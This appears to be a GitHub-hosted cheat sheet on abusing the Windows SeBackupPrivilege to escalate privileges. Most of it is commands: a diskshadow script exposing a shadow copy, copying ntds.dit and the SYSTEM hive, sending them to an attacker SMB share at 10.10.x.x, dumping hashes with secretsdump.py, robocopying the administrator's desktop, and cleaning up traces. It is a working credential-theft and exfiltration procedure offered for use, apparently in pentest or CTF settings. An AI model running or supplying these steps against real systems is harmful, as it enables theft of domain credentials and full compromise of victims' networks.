SeBackupPrivilege

Windows Privilege Escalation

View on GitHub

SeBackupPrivilege

If you’ve SeBackupPrivilege. We can use that privilege to read and get any file from the target machine. If we attack SAM, SYSTEM or ntds.dit some important files we can beacome SYSTEM.

Exploitation

First upload SeBackupPrivilegeCmdLets.dll and SeBackupPrivilegeUtils.dll to target machine.

Import he DLLs

import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll

Create a vss.dsh file

set context persistent nowriters
set metadata c:\\programdata\\test.cab        
set verbose on
add volume c: alias test
create
expose %test% z:

NOTE: c:\programdata is the writeable path where you i have upload dll and creating a test.cab

Change the file format

unix2dos vss.dsh

upload the file on C:\programdata

Use diskshadow to explore the func of copy

diskshadow /s c:\\programdata\\vss.dsh

Now you can copy any file

Copy any file to present dir and then download it to your system.

We gonna get ntds.dit and system.

Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit c:\\programdata\\ntds.dit

Now system file

reg save HKLM\SYSTEM C:\\programdata\\SYSTEM

Now we can see that both ntds.dit and SYSTEM files are in our present dir. You can also get other sensetive files like SAM, SYSTEM, SECURITY.

Download these files using smb server.

smbserver.py k4sth4 . -smb2support -username kt -password kt
net use \\10.10.x.x\k4sth4 /u:kt kt
Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit \\10.10.x.x\k4sth4\ntds.dit
reg.exe save hklm\system \\10.10.x.x\system

Now extract the hashes from ntds.dit with SYSTEM as key

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

We can also Dump the whole administrator dir into Temp

robocopy /b C:\\users\\administrator\\desktop C:\\programdata\\temp

We get all the desktop files in temp dir.

Now after doing this CleanUp is necessary

cleanUp script vss.dsh

set context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
delete shadows volume test
reset
unix2dos vss.dsh

upload and run

diskshadow /s c:\\programdata\\vss.dsh